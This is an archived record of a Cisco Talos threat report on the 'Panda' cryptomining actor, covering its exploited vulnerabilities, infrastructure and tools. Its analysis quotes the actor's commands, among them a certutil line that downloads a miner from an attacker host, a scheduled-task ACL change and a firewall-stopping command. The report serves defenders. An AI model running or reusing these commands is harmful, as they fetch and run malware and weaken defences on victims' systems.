{
	"id": "fd4ce530-e3ee-4c31-9450-5abb3bdb18ce",
	"created_at": "2026-04-06T00:17:59.896991Z",
	"updated_at": "2026-04-10T13:11:41.257056Z",
	"deleted_at": null,
	"sha1_hash": "61ac8f21bfe03ac9d3446a71584a92a9a8da0730",
	"title": "Cryptocurrency miners aren’t dead yet: Documenting the voracious but simple “Panda”",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 583745,
	"plain_text": "Cryptocurrency miners aren’t dead yet: Documenting the voracious but\r\nsimple “Panda”\r\nBy Nick Biasini\r\nPublished: 2019-09-17 · Archived: 2026-04-05 21:27:40 UTC\r\nTuesday, September 17, 2019 11:09\r\nBy Christopher Evans and David Liebenberg.\r\nExecutive summary\r\nA new threat actor named \"Panda\" has generated thousands of\r\ndollars worth of the Monero cryptocurrency through the use of remote access tools (RATs)\r\nand illicit cryptocurrency-mining malware. This is far from the most sophisticated actor\r\nwe've ever seen, but it still has been one of the most active attackers we've seen in Cisco\r\nTalos threat trap data. Panda's willingness to persistently exploit vulnerable web\r\napplications worldwide, their tools allowing them to traverse throughout networks, and\r\ntheir use of RATs mean that organizations worldwide are at risk of having their system\r\nresources misused for mining purposes or worse, such as exfiltration of valuable\r\ninformation.\r\nPanda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize\r\nindicators of compromise and proofs of concept. Our threat traps show that Panda uses exploits previously used by Shadow\r\nBrokers — a group infamous for publishing information from the National Security Agency — and Mimikatz, an open-source credential-dumping program.\r\nTalos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread\r\n\"MassMiner\" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different\r\nset of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We\r\nbelieve Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing\r\nresources and slow down networks and systems. 
Talos confirmed that organizations in the banking, healthcare,\r\ntransportation, telecommunications, and IT services industries were affected in these campaigns.\r\nhttps://blog.talosintelligence.com/2019/09/panda-evolution.html\r\nPage 1 of 9\n\nFirst sightings of the not-so-elusive Panda\r\nWe first observed this actor in July of 2018\r\nexploiting a WebLogic vulnerability (CVE-2017-10271) to drop a miner that was\r\nassociated with a campaign called \"MassMiner\" through the wallet, infrastructure, and\r\npost-exploit PowerShell commands used.\r\nPanda used Masscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities,\r\nincluding the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 (CVE-2017-5638).\r\nThey used PowerShell post-exploit to download a miner payload called \"downloader.exe,\" saving it in the TEMP folder\r\nunder a simple number filename such as \"13.exe\" and executing it. The sample attempts to download a config file from\r\nlist[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as\r\nwell as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly\r\n$100,000.\r\nBy October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been\r\ndownloaded more than 300,000 times.\r\nThe sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we\r\nalso observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. 
The samples also appear to scan for open SMB ports by\r\nreaching out over port 445 to IP addresses in the 172.105.X.X block.\r\nOne of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name \"Panda.\"\r\nBulehero connection\r\nAround the same time that we first observed these initial Panda\r\nattacks, we observed very similar TTPs in an attack using another C2 domain:\r\nbulehero[.]in. The actors used PowerShell to download a file called \"download.exe\" from\r\nb[.]bulehero[.]in, and similarly saved it under another simple number filename such as\r\n\"13.exe\" and executed it. The file server turned out to be an instance of HFS hosting four\r\nmalicious files.\r\nRunning the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign.\r\nFirst, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over\r\nthe previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original\r\nsample came, as well as the wallet and mining pool to be used for mining.\r\nAdditionally, the sample attempts to shut down the victim's firewall with commands such as \"cmd /c net stop MpsSvc\". The\r\nmalware also modifies the access control list to grant full access to certain files by running cacls.exe.\r\nFor example:\r\ncmd /c schtasks /create /sc minute /mo 1 /tn \"Netframework\" /ru system /tr \"cmd /c echo Y|cacls\r\nC:\\Windows\\appveif.exe /p everyone:F\r\nBoth of these behaviors have also been observed in previous MassMiner infections.\r\nThe malware also issues a GET request to Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp\r\nwhich provides the machine's IP address and location in Chinese. 
This behavior was also observed in the MassMiner\r\ncampaign.\r\nAdditionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be\r\nmalicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign.\r\nFor instance, several artifacts were detected as being related to the \"Shadow Brokers\" exploits and were installed in a\r\nsuspiciously named directory: \"\\Windows\\InfusedAppe\\Eternalblue139\\specials\\\".\r\nEvolution of Panda\r\nIn January of 2019, Talos analysts observed Panda exploiting a\r\nrecently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in\r\norder to spread similar malware. ThinkPHP is an open-source web framework popular in\r\nChina.\r\nPanda used this vulnerability to both directly download a file called \"download.exe\" from a46[.]bulehero[.]in and upload a\r\nsimple PHP web shell to the path \"/public/hydra.php\", which is subsequently used to invoke PowerShell to download the\r\nsame executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters\r\nin an HTTP request to \"/public/hydra.php\". Download.exe downloads the illicit miner payload and also engages in\r\nSMB scanning, evidence of Panda's attempt to move laterally within compromised organizations.\r\nIn March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain\r\nhognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address\r\n195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in.\r\nAt the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. 
Post-exploit, Panda\r\ninvokes PowerShell to download an executable called \"download.exe\" from the URL\r\nhxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saves it under a high-entropy\r\nfilename i.e. 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named\r\n\"wercplshost.exe\" from fid[.]hognoob[.]se as well as a configuration file called \"cfg.ini\" from uio[.]hognoob[.]se, which\r\nprovides configuration details for the miner.\r\n\"Wercplshost.exe\" contains exploit modules designed for lateral movement, many of which are related to the \"Shadow\r\nBrokers\" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to\r\nChinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis\r\nfor port scanning. It also uses the open-source tool Mimikatz to collect victim passwords.\r\nSoon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil\r\nto download the secondary miner payload through the command: \"certutil.exe -urlcache -split -f\r\nhttp://fid[.]hognoob[.]se/upnpprhost.exe C:\\Windows\\Temp\\upnpprhost.exe\". The coinminer is also run using the command\r\n\"cmd /c ping 127.0.0.1 -n 5 \u0026 Start C:\\Windows\\ugrpkute\\[filename].exe\".\r\nThe updated payload still includes exploit modules designed for lateral movement, many of which are related to the\r\n\"Shadow Brokers\" exploits. One departure, however, is that previously observed samples acquire the victim's internal IP and\r\nreach out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B\r\naddress as a basis for port scanning. This sample installs WinPcap and open-source tool Masscan and scans for open ports on\r\npublic IP addresses, saving the results to \"Scant.txt\" (note the typo). 
The sample also writes a list of hardcoded IP ranges to\r\n\"ip.txt\" and passes it to Masscan to scan for port 445 and saves the results to \"results.txt.\" This is potentially intended to find\r\nmachines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords.\r\nIn June, Panda began targeting a newer WebLogic vulnerability, CVE-2019-2725, but their TTPs remained the same.\r\nRecent activity\r\nPanda began employing new C2 and payload-hosting infrastructure over\r\nthe past month. We observed several attacker IPs post-exploit pulling down payloads from\r\nthe URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random\r\n20-character name, with the first 15 characters consisting of \"a\" - \"z\" characters and the last\r\nfive consisting of digits (e.g., \"xblzcdsafdmqslz19595.exe\"). Panda then executes the file\r\nvia PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is\r\nassociated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se.\r\nBesides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using\r\nCertutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to\r\ndelay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow\r\nBrokers' exploits and Mimikatz.\r\nOne difference is that several samples contained a Gh0st RAT default mutex \"DOWNLOAD_SHELL_MUTEX_NAME\"\r\nwith the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The\r\ndomain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older\r\nPanda C2 hognoob[.]se. 
Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior.\r\nOn August 19, 2019, we observed that Panda has added another set of domains to his inventory of C2 and payload-hosting\r\ninfrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL\r\nhxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as \"BBBBB,\"\r\ninstead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently\r\nresolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18.\r\nIn line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the\r\nsecondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT\r\nmutex, set to \"oo[.]mygoodluck[.]best:51888:WervPoxySvc\", and made a DNS request for this domain. The domain\r\nresolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are\r\nknown domains used by Panda. The sample also contacted li[.]bulehero2019[.]club.\r\nCisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools that include\r\nShadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best,\r\nwith a backup pool at mx[.]oops[.]best.\r\nConclusion\r\nPanda's operational security remains poor, with many of their old and current\r\ndomains all hosted on the same IP and their TTPs remaining relatively similar throughout\r\ncampaigns. The payloads themselves are also not very sophisticated.\r\nHowever, system administrators and researchers should never underestimate the damage an actor can do with widely\r\navailable tools such as Mimikatz. 
Some information from HFS used by Panda shows that this malware had a wide reach and\r\nrough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their\r\nmalicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time\r\nthey sold.\r\nPanda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure\r\nused in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities,\r\nand are quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to\r\nanyone slow to patch. And, if a cryptocurrency miner is able to infect your system, that means another actor could use the\r\nsame infection vector to deliver other malware. Panda remains an active threat and Talos will continue to monitor their\r\nactivity in order to thwart their operations.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.\r\nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites\r\nand detects malware used in these attacks.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System\r\n(NGIPS), and Meraki MX can detect malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether\r\nusers are on or off the corporate network.\r\nOpen Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for\r\npurchase 
on Snort.org.\r\nSource: https://blog.talosintelligence.com/2019/09/panda-evolution.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/2019/09/panda-evolution.html"
	],
	"report_names": [
		"panda-evolution.html"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d4f7cf97-9c98-409c-8b95-b80d14c576a5",
			"created_at": "2022-10-25T16:07:24.561104Z",
			"updated_at": "2026-04-10T02:00:05.03343Z",
			"deleted_at": null,
			"main_name": "Shadow Brokers",
			"aliases": [],
			"source_name": "ETDA:Shadow Brokers",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "171b85f2-8f6f-46c0-92e0-c591f61ea167",
			"created_at": "2023-01-06T13:46:38.830188Z",
			"updated_at": "2026-04-10T02:00:03.114926Z",
			"deleted_at": null,
			"main_name": "The Shadow Brokers",
			"aliases": [
				"Shadow Brokers",
				"ShadowBrokers",
				"The ShadowBrokers",
				"TSB"
			],
			"source_name": "MISPGALAXY:The Shadow Brokers",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "08623296-52be-4977-8622-50efda44e9cc",
			"created_at": "2023-01-06T13:46:38.549387Z",
			"updated_at": "2026-04-10T02:00:03.020003Z",
			"deleted_at": null,
			"main_name": "Equation Group",
			"aliases": [
				"Tilded Team",
				"EQGRP",
				"G0020"
			],
			"source_name": "MISPGALAXY:Equation Group",
			"tools": [
				"TripleFantasy",
				"GrayFish",
				"EquationLaser",
				"EquationDrug",
				"DoubleFantasy"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2d9fbbd7-e4c3-40e5-b751-27af27c8610b",
			"created_at": "2024-05-01T02:03:08.144214Z",
			"updated_at": "2026-04-10T02:00:03.674763Z",
			"deleted_at": null,
			"main_name": "PLATINUM COLONY",
			"aliases": [
				"Equation Group "
			],
			"source_name": "Secureworks:PLATINUM COLONY",
			"tools": [
				"DoubleFantasy",
				"EquationDrug",
				"EquationLaser",
				"Fanny",
				"GrayFish",
				"TripleFantasy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "e0fed6e6-a593-4041-80ef-694261825937",
			"created_at": "2022-10-25T16:07:23.593572Z",
			"updated_at": "2026-04-10T02:00:04.680752Z",
			"deleted_at": null,
			"main_name": "Equation Group",
			"aliases": [
				"APT-C-40",
				"G0020",
				"Platinum Colony",
				"Tilded Team"
			],
			"source_name": "ETDA:Equation Group",
			"tools": [
				"Bvp47",
				"DEMENTIAWHEEL",
				"DOUBLEFANTASY",
				"DanderSpritz",
				"DarkPulsar",
				"DoubleFantasy",
				"DoubleFeature",
				"DoublePulsar",
				"Duqu",
				"EQUATIONDRUG",
				"EQUATIONLASER",
				"EQUESTRE",
				"Flamer",
				"GRAYFISH",
				"GROK",
				"OddJob",
				"Plexor",
				"Prax",
				"Regin",
				"Skywiper",
				"TRIPLEFANTASY",
				"Tilded",
				"UNITEDRAKE",
				"WarriorPride",
				"sKyWIper"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434679,
	"ts_updated_at": 1775826701,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/61ac8f21bfe03ac9d3446a71584a92a9a8da0730.pdf",
		"text": "https://archive.orkl.eu/61ac8f21bfe03ac9d3446a71584a92a9a8da0730.txt",
		"img": "https://archive.orkl.eu/61ac8f21bfe03ac9d3446a71584a92a9a8da0730.jpg"
	}
}